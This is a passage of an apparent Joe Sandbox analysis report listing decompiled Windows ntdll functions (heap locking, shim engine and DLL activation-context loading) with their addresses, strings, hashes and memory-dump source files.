0x34ea98a9
0x34ea98ab
0x34ea98ab
0x34ea98ac
0x34ea98ae
0x34ea98b3
0x34ea98b4
0x34ea98b6
0x34ea98bd
0x00000000
0x34ea98bd
0x34e4660c
0x00000000
0x34e46624
0x34e4662a
0x34e4662f
0x34e46636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E46614
RtlDebugPrintTimes.NTDLL ref: 34E4665F

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EA9854, 34EA9895
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34EA9843
LdrpLoadShimEngine, xrefs: 34EA984A, 34EA988B
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34EA9885

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 278b742f6cff716eb17ee0389127c6ab463badb40ff36717f70856625471aabe
Instruction ID: b1ddd5c0bc5d6c6f74362c5bbfd32ec19ea7ee72e8de3f3860dd9bb95a67aa83
Opcode Fuzzy Hash: 278b742f6cff716eb17ee0389127c6ab463badb40ff36717f70856625471aabe
Instruction Fuzzy Hash: F6511F35B10344DFEB04DBB8D854A9D7BA6EB50318F080969E540BF3A5CF289C06CB84

Uniqueness

Uniqueness Score: -1.00%

Function 34EFECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34EFEDD0
RtlDebugPrintTimes.NTDLL ref: 34EFEE45

Strings

HEAP: , xrefs: 34EFECDD
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 34EFEDE3
---------------------------------------, xrefs: 34EFEDF9
Entry Heap Size , xrefs: 34EFEDED

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: b5fb1e7642cb6b97a81b5e1db83b464484cef7f45e2eb32fa579a05c0685c06b
Instruction ID: 0e1b91bd6155968fbb2df1d35b3876e579e9538dc7b7980652b490ab2585b380
Opcode Fuzzy Hash: b5fb1e7642cb6b97a81b5e1db83b464484cef7f45e2eb32fa579a05c0685c06b
Instruction Fuzzy Hash: AE416C79A00615DFD714CF28D88495ABBE5FF4935872A84A9D408AB721DB32FD43CB90

Uniqueness

Uniqueness Score: -1.00%

Function 34E7DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E34E7DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E34F19109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E34F0F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x34f43768; // 0x0
					 *0x34f491e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E34E4B910();
					} else {
						E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E34E4B910("Invalid heap signature for heap at %p", _t53);
					E34E4B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E34E4B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x34f447a1 = 1;
						asm("int3");
						 *0x34f447a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E34E5FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x34e7dac8
0x34e7dacb
0x34e7dad6
0x34ebf54e
0x34e7db0e
0x34e7db14
0x34e7db19
0x34ebf5ee
0x00000000
0x00000000
0x34ebf5fd
0x34e7db24
0x34e7db27
0x34ebf614
0x34ebf61c
0x34ebf61c
0x34ebf614
0x34e7db2d
0x34e7db2f
0x34e7db31
0x34e7db31
0x34e7db1f
0x34e7db1f
0x00000000
0x34e7db1f
0x34e7dae3
0x34ebf559
0x34ebf561
0x34ebf567
0x00000000
0x34ebf567
0x34e7daf0
0x34ebf578
0x34ebf597
0x34ebf59c
0x34ebf57a
0x34ebf58f
0x34ebf594
0x34ebf5a8
0x34ebf5b7
0x34ebf5bc
0x34ebf5c1
0x34ebf5d3
0x34ebf5d5
0x34ebf5dc
0x34ebf5dd
0x34ebf5dd
0x34ebf5e4
0x00000000
0x34e7daf6
0x34e7dafa
0x34e7db02
0x34e7db07
0x34e7db07
0x00000000
0x34e7dafa

APIs

RtlDebugPrintTimes.NTDLL ref: 34EBF561

Strings

HEAP: , xrefs: 34EBF597
HEAP[%wZ]: , xrefs: 34EBF58A
Invalid heap signature for heap at %p, xrefs: 34EBF5A3
RtlLockHeap, xrefs: 34EBF5AD
, passed to %s, xrefs: 34EBF5B2

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: daec8758914ec3ed47bd5bf1f173f52b3ff18910dd838cc2639372bb8fc2af3d
Instruction ID: 993666b2fffeca1e7174c2bfbb12cc51d2c846b62feefa82df82694488ae2471
Opcode Fuzzy Hash: daec8758914ec3ed47bd5bf1f173f52b3ff18910dd838cc2639372bb8fc2af3d
Instruction Fuzzy Hash: BC316536615788EFFB12CBE4D408F497BA8EF00768F048488E48197791CB79B980CA55

Uniqueness

Uniqueness Score: -1.00%

Function 34E59046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34E59046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x34f2be98);
				E34EA7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E34E98F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E34E69870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x34f465e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E34E6A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = L34E75A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E34E704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x34f465e0; // 0x75dea680
							 *0x34f491e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x34f465e8;
									if(_t148 != 0) {
										 *0x34f491e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E34E6DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									L34E63B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E34E69870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E34EB247B();
									goto L26;
								} else {
									_t152 = E34E6A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E34E704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x34e59046
0x34e59046
0x34e5904b
0x34e59050
0x34e59055
0x34e5905b
0x34e5905d
0x34e59066
0x34e5906f
0x34e59078
0x34e59080
0x34e59088
0x34e5908f
0x34e59095
0x34e590a9
0x34e590b1
0x34e590be
0x34e590c6
0x34e590cf
0x34e590e2
0x34e590f7
0x34e590fb
0x34e59118
0x00000000
0x34e59123
0x34e5913b
0x34e5913f
0x00000000
0x00000000
0x34e59147
0x34eb231f
0x34eb231f
0x00000000
0x34eb231f
0x34e59154
0x34eb2330
0x34eb2336
0x34eb2336
0x34e5915a
0x34e5915a
0x34e5915a
0x34e59161
0x34e59167
0x34e5916b
0x34e59172
0x34e59182
0x34e5918e
0x34e59199
0x34e591ba
0x34e591be
0x00000000
0x34e591e0
0x34eb2358
0x34eb2360
0x34eb2368
0x34eb236a
0x34eb2372
0x00000000
0x34eb2378
0x34eb2378
0x34eb2381
0x34eb2458
0x34eb2458
0x34eb245b
0x34eb2463
0x34eb2468
0x34eb246e
0x34eb246e
0x34eb24a7
0x00000000
0x34eb24a7
0x34eb238f
0x34eb2396
0x34eb239c
0x34eb239f
0x34eb239f
0x34eb23bb
0x34eb23c8
0x34eb23ca
0x34eb23d2
0x34eb244c
0x34eb244c
0x34eb2453
0x00000000
0x34eb23d4
0x34eb23e7
0x34eb23e9
0x34eb23f1
0x00000000
0x00000000
0x34eb23f9
0x34eb2402
0x34eb2408
0x34eb240c
0x34eb2413
0x34eb2423
0x34eb243f
0x00000000
0x00000000
0x34eb2441
0x34eb2446
0x34eb2446
0x00000000
0x34eb2446
0x34eb23fb
0x00000000
0x34eb23fb
0x34eb23d2
0x00000000
0x34eb2372
0x34e591be
0x34e59118
0x34e590fd
0x34e59102
0x34e5910e

APIs

RtlDebugPrintTimes.NTDLL ref: 34EB2360

Strings

@, xrefs: 34E59095
$, xrefs: 34E590B1

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: e89321b7226ccb5685fd35ca701e3f7e26413c9387e47f8f9f0669c2f224e5b9
Instruction ID: 503cb2ee470391275c7fd413dc11f7e833373c37fe77d82b041f14c09730ccb6
Opcode Fuzzy Hash: e89321b7226ccb5685fd35ca701e3f7e26413c9387e47f8f9f0669c2f224e5b9
Instruction Fuzzy Hash: ED8119B1D00269DBEB21CB54CC44BEEB7B8AF08754F0445EAA919B7250E7709E858FA1

Uniqueness

Uniqueness Score: -1.00%

Function 34E84C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E34E84C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x34f465e4; // 0x75dcf0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x34f45b24; // 0x4c12ce0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x34f465e4; // 0x75dcf0e0
					 *0x34f491e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E34E526A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x34f437c0 & 0x00000003) != 0) {
								E34ECE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x34f437c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x34f437c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E34ECE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x34e84c42
0x34e84c47
0x34e84c4a
0x34e84c4c
0x34e84c52
0x34e84cb8
0x34e84cbe
0x34e84cbe
0x34e84c5a
0x34e84c5d
0x34e84c69
0x34e84c6f
0x34e84c74
0x34e84cd6
0x34e84cda
0x34ec33b9
0x34ec33be
0x34ec33f7
0x34ec33f7
0x34ec33be
0x34e84cda
0x34e84c76
0x34e84c84
0x34e84c8c
0x34e84c90
0x34e84ca9
0x34e84ca9
0x34e84cae
0x34e84ce4
0x34e84cee
0x34e84cf3
0x34e84cf3
0x34e84ce6
0x34e84ce6
0x34e84cb2
0x34ec3463
0x34ec347b
0x34ec3480
0x34ec348a
0x34ec3490
0x34ec3490
0x34ec348a
0x00000000
0x34e84cb2
0x34e84c98
0x34e84cc5
0x34ec3429
0x00000000
0x00000000
0x34ec342f
0x34e84cc5
0x34e84ca1
0x34ec3434
0x34ec3435
0x34ec344f
0x34ec3454
0x34ec3454
0x34e84ca7
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E84C84

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34EC3439
Querying the active activation context failed with status 0x%08lx, xrefs: 34EC3466
minkernel\ntdll\ldrsnap.c, xrefs: 34EC344A, 34EC3476
LdrpFindDllActivationContext, xrefs: 34EC3440, 34EC346C

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 8121374b971e8fbda99ce01b86853f6564bd1b0f16c3adacefcbe2f464b7be37
Instruction ID: a2c918a7600722b4855cd452247ff5e2d8283c5dd4ba7d820f8a70bee7d36d58
Opcode Fuzzy Hash: 8121374b971e8fbda99ce01b86853f6564bd1b0f16c3adacefcbe2f464b7be37
Instruction Fuzzy Hash: 1731B7B7B00351AFFF11DB08C984A55B6ACFB61BACF4683EAD40867250FB609D80C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 34E7237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E34E7237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x34f438b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x34f468d8; // 0x0
						if(_t22 != 0) {
							L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x34f468d8 = _t50;
							 *0x34f45d4c = _t50;
						}
					}
					 *0x34f438b8 = _t38;
					return _t55;
				}
				_t59 =  *0x34f468d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x34f438b8 = 0;
					_t55 = L34ED1BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x34f468d8; // 0x0
						while( *_t51 != 0) {
							 *0x34f491e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x34f49218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E34E5FED0(0x34f432d8);
						if( *0x34f465f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E34E46704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x34f432d8);
						E34E5E740(_t46);
						goto L21;
					}
					_t36 =  *0x34f437c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E34ECE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x34f437c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x34e72383
0x34e7238b
0x34e7238d
0x34e72390
0x34e72393
0x34e72397
0x34e723a5
0x34e723a8
0x34e723aa
0x34e723b1
0x34eba878
0x34eba87d
0x34eba883
0x34eba883
0x34e723b1
0x34e723ba
0x34e723c3
0x34e723c3
0x34e72399
0x34e7239f
0x34eba784
0x34eba78f
0x34eba793
0x34eba7cd
0x34eba80b
0x34eba7e3
0x34eba7e9
0x34eba7ee
0x34eba866
0x34eba85f
0x34eba85f
0x00000000
0x34eba85f
0x34eba7f0
0x34eba7f2
0x34eba7f2
0x34eba7f5
0x34eba7f5
0x34eba7f8
0x34eba7fb
0x34eba808
0x34eba808
0x34eba812
0x34eba817
0x34eba81f
0x34eba825
0x34eba826
0x34eba82d
0x34eba82f
0x34eba83b
0x34eba83d
0x34eba849
0x34eba850
0x34eba850
0x34eba849
0x34eba855
0x34eba85a
0x00000000
0x34eba85a
0x34eba795
0x34eba79c
0x34eba7b4
0x34eba7b9
0x34eba7be
0x34eba7c3
0x34eba7c5
0x34eba7c5
0x34eba7c6
0x34eba7c6
0x00000000

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EBA7AF
LdrpDynamicShimModule, xrefs: 34EBA7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 34EBA79F
DG4, xrefs: 34E72382

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: DG4$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
API String ID: 0-453599719
Opcode ID: d9a5fc62bdd2c933ec41353c80de910ed724b4cc2c7f89ad4ce347c3e5c53c1d
Instruction ID: e2cbbcda1d6b3cb56e4a5b5b21cb03821fc3581dd3b08bb8e2314cf27baa20d3
Opcode Fuzzy Hash: d9a5fc62bdd2c933ec41353c80de910ed724b4cc2c7f89ad4ce347c3e5c53c1d
Instruction Fuzzy Hash: D6312476B08201EFFF149F58D884E5ABBB5EF90764F180069E880B7750DF709942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34E4F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E34E4F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x34f4b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x34f46960 - 2;
					if( *0x34f46960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E34E4B910();
						__eflags =  *0x34f45da8;
						if(__eflags == 0) {
							_t139 = 2;
							E34F0FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return L34E94B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E34EF78DE(_t141, _t161, 0, 8, 0);
					}
					E34E4FD8E(_t161, _t158);
					E34F102EC(_t161);
					_t158 = 1;
					E34E4918A(_t161, 1, 0, 0);
					E34F18E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x34f43758; // 0x0
					 *0x34f491e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E34EF78DE(_t147, _t161, 0, 8, 0);
				}
				E34E4FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
